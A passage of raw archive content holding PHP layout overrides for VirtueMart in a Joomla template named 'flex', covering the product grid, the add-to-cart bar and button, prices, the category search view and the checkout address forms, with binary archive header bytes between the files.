					<h2><?php echo JHtml::link ($product->link.$ItemidStr, $product->product_name); ?></h2>
					<div class="main_price"><?php echo shopFunctionsF::renderVmSubLayout('prices',array('product'=>$product,'currency'=>$currency)); ?></div>
                
					<?php if(!empty($rowsHeight[$row]['product_s_desc'])){ ?>
                    
                        <div class="product_s_desc">
							<?php // Product Short Description
                            if (!empty($product->product_s_desc)) {
                                echo '<div class="clear"></div><hr />' . shopFunctionsF::limitStringByWord ($product->product_s_desc, 60, ' ...') ?>
                            <?php } ?>
                        </div>
                    
					<?php  } ?>
                    
                <div class="clear"></div>
				<div class="vm3pr-<?php // echo $rowsHeight[$row]['customfields'] ?>"> <?php
				echo '<hr /><span style="margin:0 auto;display:table;" class="centered">'.shopFunctionsF::renderVmSubLayout('stockhandle',array('product'=>$product)).'</span>';
				echo shopFunctionsF::renderVmSubLayout('addtocart',array('product'=>$product,'rowHeights'=>$rowsHeight[$row], 'position' => array('ontop', 'addtocart'))); 
				
				?>
				</div>
               <div class="clear"></div>

				<div class="vm-details-button">
					<?php // Product Details Button
					
					$link = empty($product->link)? $product->canonical:$product->link;
				echo JHtml::link($link.$ItemidStr,vmText::_ ( 'COM_VIRTUEMART_PRODUCT_DETAILS' ), array ('title' => $product->product_name, 'class' => 'product-details' ) );
					?>
				</div>
                <?php if(vRequest::getInt('dynamic')){
					echo vmJsApi::writeJS();
				} ?>
			</div> <!--spacer-inner-->
		</div> <!--spacer-->
	</div>

	<?php
    $nb ++;

      // Do we need to close the current row now?
      if ($col == $products_per_row || $nb>$BrowseTotalProducts) { ?>
    <div class="clear"></div>
  </div>
      <?php
      	$col = 1;
		$row++;
    } else {
      $col ++;
    }
  }

      if( (!empty($type) and count($products)>0) or (count($viewData['products'])>1 and count($products)>0) ){
        // Do we need a final closing row tag?
        //if ($col != 1) {
      ?>
    <div class="clear"></div>
  </div>
    <?php
    // }
    }
  }
PK!>B��		1flex/html/com_virtuemart/sublayouts/addtocart.phpnu&1i�<?php
/**
 *
 * Show the product details page
 *
 * @package    VirtueMart
 * @subpackage
 * @author Max Milbers, Valerie Isaksen
 * @todo handle child products
 * @link https://virtuemart.net
 * @copyright Copyright (c) 2004 - 2010 VirtueMart Team. All rights reserved.
 * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php
 * VirtueMart is free software. This version may have been modified pursuant
 * to the GNU General Public License, and as distributed it includes or
 * is derivative of works licensed under the GNU General Public License or
 * other free or open source software licenses.
 * @version $Id: default_addtocart.php 7833 2014-04-09 15:04:59Z Milbo $
 */
// Check to ensure this file is included in Joomla!
defined('_JEXEC') or die('Restricted access');
$product = $viewData['product'];

if(isset($viewData['rowHeights'])){
	$rowHeights = $viewData['rowHeights'];
} else {
	$rowHeights['customfields'] = TRUE;
}

if(isset($viewData['position'])){
	$positions = $viewData['position'];
} else {
	$positions = 'addtocart';
}
if(!is_array($positions)) $positions = array($positions);



?>
	<div class="addtocart-area">
		<form method="post" class="product js-recalculate" action="<?php echo JRoute::_ ('index.php?option=com_virtuemart',false); ?>" autocomplete="off" >
			<div class="vm-customfields-wrap">
				<?php
				if(!empty($rowHeights['customfields'])) {
					foreach($positions as $pos){
						echo shopFunctionsF::renderVmSubLayout('customfields',array('product'=>$product,'position'=>$pos));
					}
				} ?>
			</div>			
				<?php
				if (!VmConfig::get('use_as_catalog', 0)  ) {
					echo shopFunctionsF::renderVmSubLayout('addtocartbar',array('product'=>$product));
				} ?>
			<input type="hidden" name="option" value="com_virtuemart"/>
			<input type="hidden" name="view" value="cart"/>
			<input type="hidden" name="virtuemart_product_id[]" value="<?php echo $product->virtuemart_product_id ?>"/>
			<input type="hidden" name="pname" value="<?php echo $product->product_name ?>"/>
			<input type="hidden" name="pid" value="<?php echo $product->virtuemart_product_id ?>"/>
			<?php
			$itemId=vRequest::getInt('Itemid',false);
			if($itemId){
				echo '<input type="hidden" name="Itemid" value="'.$itemId.'"/>';
			} ?>
		</form>

	</div>

<?php // }
?>PK!��R�4flex/html/com_virtuemart/sublayouts/addtocartbtn.phpnu&1i�<?php
/**
 *
 * loads the add to cart button
 *
 * @package    VirtueMart
 * @subpackage
 * @author Max Milbers, Valerie Isaksen
 * @link http://www.virtuemart.net
 * @copyright Copyright (c) 2015 VirtueMart Team. All rights reserved.
 * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php
 * @version $Id: addtocartbtn.php 8024 2014-06-12 15:08:59Z Milbo $
 */
// Check to ensure this file is included in Joomla!
defined ('_JEXEC') or die('Restricted access');

if($viewData['orderable']) {
	echo '<button class="add-to-cart sppb-btn sppb-btn-primary" type="submit" name="addtocart">
			<input type="submit" name="addtocart" class="add-to-cart addtocart-button" value="'.vmText::_( 'COM_VIRTUEMART_CART_ADD_TO' ).'" title="'.vmText::_( 'COM_VIRTUEMART_CART_ADD_TO' ).'" />
			<svg x="0px" y="0px" width="32px" height="32px" viewBox="0 0 32 32">
				<path stroke-dasharray="19.79 19.79" stroke-dashoffset="19.79" fill="none" stroke="#FFFFFF" stroke-width="2" stroke-linecap="square" stroke-miterlimit="10" d="M9,17l3.9,3.9c0.1,0.1,0.2,0.1,0.3,0L23,11"/>
			</svg>
		</button>';
} else {
	echo '<span name="addtocart" class="addtocart-button-disabled" title="'.vmText::_( 'COM_VIRTUEMART_ADDTOCART_CHOOSE_VARIANT' ).'" >'.vmText::_( 'COM_VIRTUEMART_ADDTOCART_CHOOSE_VARIANT' ).'</span>';
}PK!�_���4flex/html/com_virtuemart/sublayouts/addtocartbar.phpnu&1i�<?php
/**
 *
 * Show the product details page
 *
 * @package    VirtueMart
 * @subpackage
 * @author Max Milbers
 * @todo handle child products
 * @link http://www.virtuemart.net
 * @copyright Copyright (c) 2015 VirtueMart Team. All rights reserved.
 * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php
 * VirtueMart is free software. This version may have been modified pursuant
 * to the GNU General Public License, and as distributed it includes or
 * is derivative of works licensed under the GNU General Public License or
 * other free or open source software licenses.
 * @version $Id: default_addtocart.php 7833 2014-04-09 15:04:59Z Milbo $
 */
// Check to ensure this file is included in Joomla!
defined('_JEXEC') or die('Restricted access');
$product = $viewData['product'];

if(isset($viewData['rowHeights'])){
	$rowHeights = $viewData['rowHeights'];
} else {
	$rowHeights['customfields'] = TRUE;
}

$init = 1;
if(isset($viewData['init'])){
	$init = $viewData['init'];
}

if(!empty($product->min_order_level) and $init<$product->min_order_level){
	$init = $product->min_order_level;
}

$step=1;
if (!empty($product->step_order_level)){
	$step=$product->step_order_level;
	if(!empty($init)){
		if($init<$step){
			$init = $step;
		} else {
			$init = ceil($init/$step) * $step;

		}
	}
	if(empty($product->min_order_level) and !isset($viewData['init'])){
		$init = $step;
	}
}

$maxOrder= '';
if (!empty($product->max_order_level)){
	$maxOrder = ' max="'.$product->max_order_level.'" ';
}

$addtoCartButton = '';
if(!VmConfig::get('use_as_catalog', 0)){
	if(!$product->addToCartButton and $product->addToCartButton!==''){
		$addtoCartButton = self::renderVmSubLayout('addtocartbtn',array('orderable'=>$product->orderable)); 
	} else {
		$addtoCartButton = $product->addToCartButton;
	}
}
$position = 'addtocart';

if ($product->min_order_level > 0) {
	$minOrderLevel = $product->min_order_level;
}
else {
	$minOrderLevel = 1;
}

if (!VmConfig::get('use_as_catalog', 0)  ) { ?>

	<div class="addtocart-bar">
	<?php
	// Display the quantity box
	$stockhandle = VmConfig::get('stockhandle_products', false) && $product->product_stockhandle ? $product->product_stockhandle : VmConfig::get('stockhandle','none');
	if (($stockhandle == 'disableit' or $stockhandle == 'disableadd') and ($product->product_in_stock - $product->product_ordered) < $minOrderLevel) { ?>
        <a href="<?php echo JRoute::_ ('index.php?option=com_virtuemart&view=productdetails&layout=notify&virtuemart_product_id=' . $product->virtuemart_product_id); ?>" class="sppb-btn sppb-btn-default btn-sm centered notify"><?php echo vmText::_ ('COM_VIRTUEMART_CART_NOTIFY') ?></a><?php	
	} else {
		$tmpPrice = (float) $product->prices['costPrice'];
		if (!( VmConfig::get('askprice', true) and empty($tmpPrice) ) ) { ?>
			
               <?php if ($product->orderable) { ?>
                    <span class="calculate">
                    	<label for="quantity<?php echo $product->virtuemart_product_id; ?>" class="quantity_box"><?php echo vmText::_ ('COM_VIRTUEMART_CART_QUANTITY'); ?>: </label>
                        <span class="quantity-box">
                        <input type="text" class="quantity-input js-recalculate" name="quantity[]"
                            data-errStr="<?php echo vmText::sprintf('COM_VIRTUEMART_WRONG_AMOUNT_ADDED', $step)?>"
                            value="<?php echo $init; ?>" data-init="<?php echo $init; ?>" data-step="<?php echo $step; ?>" <?php echo $maxOrder; ?> />
                        </span>
                        <span class="quantity-controls js-recalculate">
                        <input type="button" class="quantity-controls quantity-plus"/><i class="fa fa-chevron-up "></i>
                        <input type="button" class="quantity-controls quantity-minus"/><i class="fa fa-chevron-down"></i>
                         </span>
                     </span>
                <?php }  ?>
          
			<?php if(!empty($addtoCartButton)){ ?>
            	<span class="cd-customization">
					<?php echo $addtoCartButton; ?>
                </span>
			<?php } ?>
			<input type="hidden" name="virtuemart_product_id[]" value="<?php echo $product->virtuemart_product_id ?>"/>
			<noscript><input type="hidden" name="task" value="add"/></noscript><?php
		}
	} ?>

	</div><?php
} ?>
PK!UuQ���+flex/html/com_virtuemart/sublayouts/tos.phpnu&1i�<?php
/**
 * field tos
 *
 * @package	VirtueMart
 * @subpackage Cart
 * @author Max Milbers
 * @link http://www.virtuemart.net
 * @copyright Copyright (c) 2014 VirtueMart Team. All rights reserved.
 * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL2, see LICENSE.php
 * @version $Id: cart.php 7682 2014-02-26 17:07:20Z Milbo $
 */

defined('_JEXEC') or die('Restricted access');
$_prefix = $viewData['prefix'];
$field = $viewData['field'];
$tos = $field['value'];

$app = JFactory::getApplication();
if($app->isSite()){
	vmJsApi::popup('#full-tos','#terms-of-service');
	if (!class_exists('VirtueMartCart')) require(VMPATH_SITE . DS . 'helpers' . DS . 'cart.php');
	$cart = VirtuemartCart::getCart();
	$cart->prepareVendor();
	if(empty($tos) and !VmConfig::get ('agree_to_tos_onorder', true)){
		if(is_array($cart->BT) and !empty($cart->BT['tos'])){
			$tos = $cart->BT['tos'];
		}
	}
}

if(!class_exists('VmHtml')) require(VMPATH_ADMIN.DS.'helpers'.DS.'html.php');
echo VmHtml::checkbox ($_prefix.$field['name'], $tos, 1, 0, 'class="terms-of-service required check"', 'tos');

if ( $app->isSite() ) {
?>
<div class="terms-of-service">
	<label for="tos">
		<a href="<?php echo JRoute::_ ('index.php?option=com_virtuemart&view=vendor&layout=tos&virtuemart_vendor_id=1', FALSE) ?>" class="terms-of-service" id="terms-of-service" rel="facebox" target="_blank">
			<!--<span class="vmicon vm2-termsofservice-icon"></span>-->
            <i class="fa fa-file-text"></i>
			<?php echo vmText::_ ('COM_VIRTUEMART_CART_TOS_READ_AND_ACCEPTED') ?>
		</a>
	</label>

	<div id="full-tos">
		<h2 style="margin-bottom:30px;" class="full-tos-title"><?php echo vmText::_ ('COM_VIRTUEMART_CART_TOS') ?></h2>
		<?php echo $cart->vendor->vendor_terms_of_service ?>
	</div>
</div>
<?php
}



?>PK!;Rvu��.flex/html/com_virtuemart/sublayouts/prices.phpnu&1i�<?php
/**
 *
 * Show the product prices
 *
 * @package    VirtueMart
 * @subpackage
 * @author Max Milbers, Valerie Isaksen
 * @link ${PHING.VM.MAINTAINERURL}
 * @copyright Copyright (c) 2004 - 2014 VirtueMart Team. All rights reserved.
 * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php
 * VirtueMart is free software. This version may have been modified pursuant
 * to the GNU General Public License, and as distributed it includes or
 * is derivative of works licensed under the GNU General Public License or
 * other free or open source software licenses.
 * @version $Id: default_showprices.php 8024 2014-06-12 15:08:59Z Milbo $
 */
// Check to ensure this file is included in Joomla!
defined ('_JEXEC') or die('Restricted access');
$product = $viewData['product'];
$currency = $viewData['currency'];

?>
<div class="product-price" id="productPrice<?php echo $product->virtuemart_product_id ?>">
	<?php

	if ($product->prices['salesPrice']<=0 and VmConfig::get ('askprice', 1) and isset($product->images[0]) and !$product->images[0]->file_is_downloadable) {
		$askquestion_url = JRoute::_('index.php?option=com_virtuemart&view=productdetails&task=askquestion&virtuemart_product_id=' . $product->virtuemart_product_id . '&virtuemart_category_id=' . $product->virtuemart_category_id . '&tmpl=component', FALSE);
		?>
		<a class="ask-a-question bold" href="<?php echo $askquestion_url ?>" rel="nofollow" ><?php echo vmText::_ ('COM_VIRTUEMART_PRODUCT_ASKPRICE') ?></a>
		<?php
	} else {
	
	if (round($product->prices['basePrice']) > round($product->prices['salesPrice'])) {
		echo '<div class="price-without-discount">' . $currency->createPriceDiv ('basePrice', 'COM_VIRTUEMART_PRODUCT_BASEPRICE', $product->prices) . '</div>';
	}
		
		echo $currency->createPriceDiv ('basePriceVariant', 'COM_VIRTUEMART_PRODUCT_BASEPRICE_VARIANT', $product->prices);
		
	echo $currency->createPriceDiv ('variantModification', 'COM_VIRTUEMART_PRODUCT_VARIANT_MOD', $product->prices);
	
	if (round($product->prices['basePriceWithTax'],$currency->_priceConfig['salesPrice'][1]) != round($product->prices['salesPrice'],$currency->_priceConfig['salesPrice'][1])) {
		echo '<div class="price-without-discount"><span class="price-crossed">' . $currency->createPriceDiv ('basePriceWithTax', 'COM_VIRTUEMART_PRODUCT_BASEPRICE_WITHTAX', $product->prices) . "</span></div>";
	}
	if (round($product->prices['salesPriceWithDiscount'],$currency->_priceConfig['salesPrice'][1]) != round($product->prices['salesPrice'],$currency->_priceConfig['salesPrice'][1])) {
		echo $currency->createPriceDiv ('salesPriceWithDiscount', 'COM_VIRTUEMART_PRODUCT_SALESPRICE_WITH_DISCOUNT', $product->prices);
	}

	echo $currency->createPriceDiv ('salesPrice', 'COM_VIRTUEMART_PRODUCT_SALESPRICE', $product->prices);
	echo $currency->createPriceDiv ('salesPriceTt', 'COM_VIRTUEMART_PRODUCT_SALESPRICE_TT', $product->prices);
	
	if ($product->prices['discountedPriceWithoutTax'] != $product->prices['priceWithoutTax']) {
		echo $currency->createPriceDiv ('discountedPriceWithoutTax', 'COM_VIRTUEMART_PRODUCT_SALESPRICE_WITHOUT_TAX', $product->prices);
		echo $currency->createPriceDiv ('discountedPriceWithoutTaxTt', 'COM_VIRTUEMART_PRODUCT_SALESPRICE_WITHOUT_TAX_TT', $product->prices);
	} else {
		echo $currency->createPriceDiv ('priceWithoutTax', 'COM_VIRTUEMART_PRODUCT_SALESPRICE_WITHOUT_TAX', $product->prices);
		echo $currency->createPriceDiv ('priceWithoutTaxTt', 'COM_VIRTUEMART_PRODUCT_SALESPRICE_WITHOUT_TAX_TT', $product->prices);
	}
	
	// Discount "Percent OFF"
	// First calculate percentage:
	$percentDiscount = (1 - $product->prices['discountedPriceWithoutTax'] / $product->prices['basePrice']) * 100;
	
	(VmConfig::get ('discountAmountText', 1) == 1) ? $discountAmountText = vmText::sprintf('COM_VIRTUEMART_PRODUCT_DISCOUNT_AMOUNT') : $discountAmountText = '';
	
	
	if (VmConfig::get ('discountAmount', 1)) {
		if (!empty($product->prices['discountAmount']) && round($product->prices['basePrice']) > round($product->prices['salesPrice'])) {
			echo '<div class="percent-off">'. $discountAmountText . round($percentDiscount, 0) . '%<span class="discount_off">' . JText::_('VM_DISCOUNT_OFF') . '</span></div>';
		}
	}
	
	echo $currency->createPriceDiv ('discountAmountTt', 'COM_VIRTUEMART_PRODUCT_DISCOUNT_AMOUNT_TT', $product->prices);
	echo $currency->createPriceDiv ('taxAmount', 'COM_VIRTUEMART_PRODUCT_TAX_AMOUNT', $product->prices);
	echo $currency->createPriceDiv ('taxAmountTt', 'COM_VIRTUEMART_PRODUCT_TAX_AMOUNT_TT', $product->prices);
	$unitPriceDescription = vmText::sprintf ('COM_VIRTUEMART_PRODUCT_UNITPRICE', vmText::_('COM_VIRTUEMART_UNIT_SYMBOL_'.$product->product_unit));
	echo $currency->createPriceDiv ('unitPrice', $unitPriceDescription, $product->prices);
	}
	?>
</div>

PK!/,Oqq-flex/html/com_virtuemart/category/default.phpnu&1i�<?php
/**
 *
 * Show the products in a category
 *
 * @package    VirtueMart
 * @subpackage
 * @author RolandD
 * @author Max Milbers
 * @todo add pagination
 * @link http://www.virtuemart.net
 * @copyright Copyright (c) 2004 - 2010 VirtueMart Team. All rights reserved.
 * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php
 * VirtueMart is free software. This version may have been modified pursuant
 * to the GNU General Public License, and as distributed it includes or
 * is derivative of works licensed under the GNU General Public License or
 * other free or open source software licenses.
 * @version $Id: default.php 9017 2015-10-14 10:44:34Z Milbo $
 */

defined ('_JEXEC') or die('Restricted access');

if(vRequest::getInt('dynamic')){
	if (!empty($this->products)) {
		if($this->fallback){
			$p = $this->products;
			$this->products = array();
			$this->products[0] = $p;
			vmdebug('Refallback');
		}

		echo shopFunctionsF::renderVmSubLayout($this->productsLayout,array('products'=>$this->products,'currency'=>$this->currency,'products_per_row'=>$this->perRow,'showRating'=>$this->showRating));

	}

	return ;
}

?> <div class="category-view">
<?php
$js = "
jQuery(document).ready(function () {
	jQuery('.orderlistcontainer').click(function() {
	  jQuery(this).find('.orderlist').toggle();
	});
});
";
vmJsApi::addJScript('vm.hover',$js);

// Show child categories
if ($this->showcategory and empty($this->keyword)) {
	if (!empty($this->category->haschildren)) {
		echo ShopFunctionsF::renderVmSubLayout('categories',array('categories'=>$this->category->children));
	}
}

if($this->showproducts){
?>
<div class="browse-view">
<?php

if ($this->showsearch or !empty($this->keyword)) {
	//id taken in the view.html.php could be modified
	$category_id  = vRequest::getInt ('virtuemart_category_id', 0); ?>
	<h3 class="searched-word"><?php echo $this->keyword; ?></h3>

	<form action="<?php echo JRoute::_ ('index.php?option=com_virtuemart&view=category&limitstart=0', FALSE); ?>" method="get">

		<!--BEGIN Search Box -->
		<div class="vm-flex-search">
			<?php if(!empty($this->searchCustomList)) { ?>
			<div class="vm-search-custom-list">
				<?php echo $this->searchCustomList ?>
			</div>
			<?php } ?>

			<?php if(!empty($this->searchCustomValues)) { ?>
			<div class="vm-search-custom-values">
				<?php
                echo ShopFunctionsF::renderVmSubLayoutAsGrid(
                    'searchcustomvalues',
                    array (
                        'searchcustomvalues' => $this->searchCustomValues,
                        'options' => array (
                            'items_per_row' => array (
                                'xs' => 2,
                                'sm' => 2,
                                'md' => 2,
                                'lg' => 2,
                                'xl' => 2,
                            ),
                        ),
                    )
                );
                ?>
			</div>
			<?php } ?>
			<input name="keyword" class="inputbox" type="text" size="220" value="<?php echo $this->keyword; ?>"/>
			<button type="submit" value="<?php echo vmText::_ ('COM_VIRTUEMART_SEARCH') ?>" class="vm-search-button" onclick="this.form.keyword.focus();"/><i class="fa fa-search"></i></button>
		</div>
			<!-- input type="hidden" name="showsearch" value="true"/ -->
			<input type="hidden" name="view" value="category"/>
			<input type="hidden" name="option" value="com_virtuemart"/>
			<input type="hidden" name="virtuemart_category_id" value="<?php echo $category_id; ?>"/>
			<input type="hidden" name="Itemid" value="<?php echo $this->Itemid; ?>"/>

	</form>
    <div style="margin-bottom:35px;" class="clear"></div>
	<!-- End Search Box -->
<?php
	$j = 'jQuery(document).ready(function() {

jQuery(".changeSendForm")
	.off("change",Virtuemart.sendCurrForm)
    .on("change",Virtuemart.sendCurrForm);
})';

	vmJsApi::addJScript('sendFormChange',$j);
} ?>
<h1><?php echo vmText::_($this->category->category_name); ?></h1>
<?php if (empty($this->keyword) and !empty($this->category)) { ?>
<div style="margin-bottom:25px;" class="clear"></div>
<div class="category_description">
	<?php echo $this->category->category_description; ?>
</div>
<?php } ?>

<hr />
<?php // Show child categories ?>
    
<div class="orderby-displaynumber">
	<div class="floatleft vm-order-list">
		<?php echo $this->orderByList['orderby']; ?>
		<?php echo $this->orderByList['manufacturer']; ?>
	</div>

	<div class="floatright display-number"><span><?php echo $this->vmPagination->getResultsCounter ();?></span><span><?php echo $this->vmPagination->getLimitBox ($this->category->limit_list_step); ?></span></div>


	<div class="clear"></div>
</div> <!-- end of orderby-displaynumber -->



	<?php
	if (!empty($this->products)) {
		//revert of the fallback in the view.html.php, will be removed vm3.2
		if($this->fallback){
			$p = $this->products;
			$this->products = array();
			$this->products[0] = $p;
			vmdebug('Refallback');
		}

	echo shopFunctionsF::renderVmSubLayout($this->productsLayout,array('products'=>$this->products,'currency'=>$this->currency,'products_per_row'=>$this->perRow,'showRating'=>$this->showRating));
	?>
<div class="clear"></div>
<?php if(!empty($this->orderByList)) { ?>
		<div class="vm-pagination-bottom"><?php echo $this->vmPagination->getPagesLinks (); ?>
		<?php // echo $this->vmPagination->getPagesCounter (); ?></div>
	<?php }
} elseif (!empty($this->keyword)) {
	echo vmText::_ ('COM_VIRTUEMART_NO_RESULT') . ($this->keyword ? ' : (' . $this->keyword . ')' : '');
}
?>
</div>

<?php } ?>
</div>

<?php
if(VmConfig::get ('jdynupdate', TRUE)){
$j = "Virtuemart.container = jQuery('.category-view');
Virtuemart.containerSelector = '.category-view';";
$j = "jQuery(document).ready(function($) {var productCustomization=$('.cd-customization'),cart=$('.cd-cart'),animating=false;initCustomization(productCustomization);$('body').on('click',function(event){if($(event.target).is('body')||$(event.target).is('.cd-gallery')){deactivateCustomization()}});function initCustomization(items){items.each(function(){var actual=$(this),addToCartBtn=actual.find('.add-to-cart'),touchSettings=actual.next('.cd-customization-trigger');addToCartBtn.on('click',function(){if(!animating){animating=true;resetCustomization(addToCartBtn);addToCartBtn.addClass('is-added').find('path').eq(0).animate({'stroke-dashoffset':0},300,function(){setTimeout(function(){updateCart();addToCartBtn.removeClass('is-added').find('.addtocart-button').on('webkitTransitionEnd otransitionend oTransitionEnd msTransitionEnd transitionend',function(){addToCartBtn.find('path').eq(0).css('stroke-dashoffset','19.79');animating=false});if($('.no-csstransitions').length>0){addToCartBtn.find('path').eq(0).css('stroke-dashoffset','19.79');animating=false}},600)})}});touchSettings.on('click',function(event){event.preventDefault();resetCustomization(addToCartBtn)})})}function resetCustomization(selectOptions){selectOptions.siblings('[data-type=\"select\"]').removeClass('is-open').end().parents('.cd-single-item').addClass('hover').parent('li').siblings('li').find('.cd-single-item').removeClass('hover').end().find('[data-type=\"select\"]').removeClass('is-open')}function deactivateCustomization(){productCustomization.parent('.cd-single-item').removeClass('hover').end().find('[data-type=\"select\"]').removeClass('is-open')}function updateCart(){(!cart.find('.total_products').hasClass('items-added'))&&cart.find('.total_products').addClass('items-added').removeClass('empty_basket');var cartItems=cart.find('span'),text=parseInt(cartItems.text())+1;cartItems.text(text)}});";
//$j = preg_replace('/[\n\t]+/m', '', $j); // Remove whitespace
vmJsApi::addJScript('ajax_category',$j);
	vmJsApi::jDynUpdate();
}
?>PK!vd��.flex/html/com_virtuemart/user/edit_address.phpnu&1i�<?php
/**
 *
 * Enter address data for the cart, when anonymous users checkout
 *
 * @package    VirtueMart
 * @subpackage User
 * @author Oscar van Eijk, Max Milbers
 * @link https://virtuemart.net
 * @copyright Copyright (c) 2004 - 2010 VirtueMart Team. All rights reserved.
 * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php
 * VirtueMart is free software. This version may have been modified pursuant
 * to the GNU General Public License, and as distributed it includes or
 * is derivative of works licensed under the GNU General Public License or
 * other free or open source software licenses.
 * @version $Id: edit_address.php 10163 2019-10-09 07:09:10Z Milbo $
 */
// Check to ensure this file is included in Joomla!
defined ('_JEXEC') or die('Restricted access');


vmJsApi::css('vmpanels');

$this->cart = VirtueMartCart::getCart();
$url = 0;
if ($this->cart->_fromCart or $this->cart->getInCheckOut()) {
	$rview = 'cart';
}
else {
	$rview = 'user';
}

function renderControlButtons($view,$rview){
	?><hr />
    <div class="control-buttons">
	<?php


	if ($view->cart->getInCheckOut() || $view->address_type == 'ST') {
		$buttonclass = 'default';
	}
	else {
		$buttonclass = 'button vm-button-correct';
	}


	if (VmConfig::get ('oncheckout_show_register', 1) && $view->userDetails->JUser->id == 0 && !VmConfig::get ('oncheckout_only_registered', 0) && $view->address_type == 'BT' and $rview == 'cart') {
		echo '<div class="reg_text">'.vmText::sprintf ('COM_VIRTUEMART_ONCHECKOUT_DEFAULT_TEXT_REGISTER', vmText::_ ('COM_VIRTUEMART_REGISTER_AND_CHECKOUT'), vmText::_ ('COM_VIRTUEMART_CHECKOUT_AS_GUEST')).'</div>';			}
	else {
		//echo vmText::_('COM_VIRTUEMART_REGISTER_ACCOUNT');
	}
	if (VmConfig::get ('oncheckout_show_register', 1) && $view->userDetails->JUser->id == 0 && $view->address_type == 'BT' and $rview == 'cart') {
		?>
		<button name="register" class="sppb-btn <?php echo $buttonclass ?>" type="submit" onclick="javascript:return myValidator(userForm,true);"
				title="<?php echo vmText::_ ('COM_VIRTUEMART_REGISTER_AND_CHECKOUT'); ?>"><?php echo vmText::_ ('COM_VIRTUEMART_REGISTER_AND_CHECKOUT'); ?></button>
		<?php if (!VmConfig::get ('oncheckout_only_registered', 0)) { ?>
			<button name="save" style="min-width:140px;margin-left:6px;margin-right:6px;" class="sppb-btn sppb-btn-default <?php echo $buttonclass ?>" title="<?php echo vmText::_ ('COM_VIRTUEMART_CHECKOUT_AS_GUEST'); ?>" type="submit" onclick="javascript:return myValidator(userForm, false);"><?php echo vmText::_ ('COM_VIRTUEMART_CHECKOUT_AS_GUEST'); ?></button>
		<?php } ?>
		<button style="min-width:140px;" class="btn btn-primary" type="reset" onclick="window.location.href='<?php echo JRoute::_ ('index.php?option=com_virtuemart&view=' . $rview.'&task=cancel'); ?>'"><?php echo vmText::_ ('COM_VIRTUEMART_CANCEL'); ?></button>
	<?php
	}
	else {
		?>
		<button style="min-width:140px;margin-left:6px;margin-right:6px;" class="btn sppb-btn-default" type="submit"
				onclick="javascript:return myValidator(userForm,true);"><?php echo vmText::_ ('COM_VIRTUEMART_SAVE'); ?></button>
		<button style="min-width:140px;" class="btn btn-primary" type="reset"
				onclick="window.location.href='<?php echo JRoute::_ ('index.php?option=com_virtuemart&view=' . $rview.'&task=cancel'); ?>'"><?php echo vmText::_ ('COM_VIRTUEMART_CANCEL'); ?></button>
	<?php } ?>
</div><div class="clear"></div>
<?php } ?>
<h1 style="margin-bottom:35px;"><?php echo $this->page_title ?></h1>
<?php


$task = '';
if ($this->cart->getInCheckOut()){
	$task = '&task=checkout';
}
$url = 'index.php?option=com_virtuemart&view='.$rview.$task;

?>
<div class="width30 floatleft vm-cart-header">
    <div class="payments-signin-button"></div>
</div>
<?php
echo shopFunctionsF::getLoginForm (TRUE, FALSE, $url);

?>

<form method="post" id="userForm" name="userForm" class="form-validate" action="<?php echo JRoute::_('index.php?option=com_virtuemart&view=user',$this->useXHTML,$this->useSSL) ?>">
<fieldset>
	<div style="margin-top:45px;" class="clear"></div><h3><?php
		if ($this->address_type == 'BT') {
			echo vmText::_ ('COM_VIRTUEMART_USER_FORM_EDIT_BILLTO_LBL');
		}
		else {
			echo vmText::_ ('COM_VIRTUEMART_USER_FORM_ADD_SHIPTO_LBL');
		}
		?>
	</h3>

	<!--<form method="post" id="userForm" name="userForm" action="<?php echo JRoute::_ ('index.php'); ?>" class="form-validate">-->
	<?php
	if (count ($this->userFields['functions']) > 0) {
		echo '<script language="javascript">' . "\n";
		echo join ("\n", $this->userFields['functions']);
		echo '</script>' . "\n";
	}

	echo $this->loadTemplate ('userfields');

	// captcha addition
	if(VmConfig::get ('reg_captcha') && JFactory::getUser()->guest == 1){
		?>
		<fieldset id="recaptcha_wrapper">
			<?php if(!VmConfig::get ('oncheckout_only_registered')) { ?>
				<span class="userfields_info"><?php echo vmText::_ ('COM_VIRTUEMART_USER_FORM_CAPTCHA'); ?></span>
			<?php } ?>
			<?php 
			echo $this->captcha; 
			echo '<div style="margin-top:25px;" class="clear"></div>';
			?>
		</fieldset><?php }
	// end of captcha addition
	

	renderControlButtons($this,$rview);
	if ($this->userDetails->virtuemart_user_id) {
		echo $this->loadTemplate ('addshipto');
	} ?>
	<input type="hidden" name="option" value="com_virtuemart"/>
	<input type="hidden" name="view" value="user"/>
	<input type="hidden" name="controller" value="user"/>
	<input type="hidden" name="task" value="saveUser"/>
	<input type="hidden" name="layout" value="<?php echo $this->getLayout (); ?>"/>
	<input type="hidden" name="address_type" value="<?php echo $this->address_type; ?>"/>
	<?php if (!empty($this->virtuemart_userinfo_id)) {
		echo '<input type="hidden" name="shipto_virtuemart_userinfo_id" value="' . (int)$this->virtuemart_userinfo_id . '" />';
	}
	echo JHtml::_ ('form.token');
	?>

</fieldset>
</form>PK!K
�44.flex/html/com_virtuemart/user/edit_shopper.phpnu&1i�<?php
/**
 *
 * Modify user form view, User info
 *
 * @package	VirtueMart
 * @subpackage User
 * @author Oscar van Eijk
 * @link https://virtuemart.net
 * @copyright Copyright (c) 2004 - 2010 VirtueMart Team. All rights reserved.
 * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php
 * VirtueMart is free software. This version may have been modified pursuant
 * to the GNU General Public License, and as distributed it includes or
 * is derivative of works licensed under the GNU General Public License or
 * other free or open source software licenses.
 * @version $Id: edit_shopper.php 9413 2017-01-04 17:20:58Z Milbo $
 */

// Check to ensure this file is included in Joomla!
defined('_JEXEC') or die('Restricted access');


if( $this->userDetails->virtuemart_user_id!=0) {
    echo $this->loadTemplate('vmshopper');
}

echo $this->loadTemplate('address_userfields');

if ($this->userDetails->JUser->get('id') ) {
  echo $this->loadTemplate('address_addshipto');
}

if(!empty($this->virtuemart_userinfo_id)){
	echo '<input type="hidden" name="virtuemart_userinfo_id" value="'.(int)$this->virtuemart_userinfo_id.'" />';
}

if(!$this->userDetails->user_is_vendor){ ?>
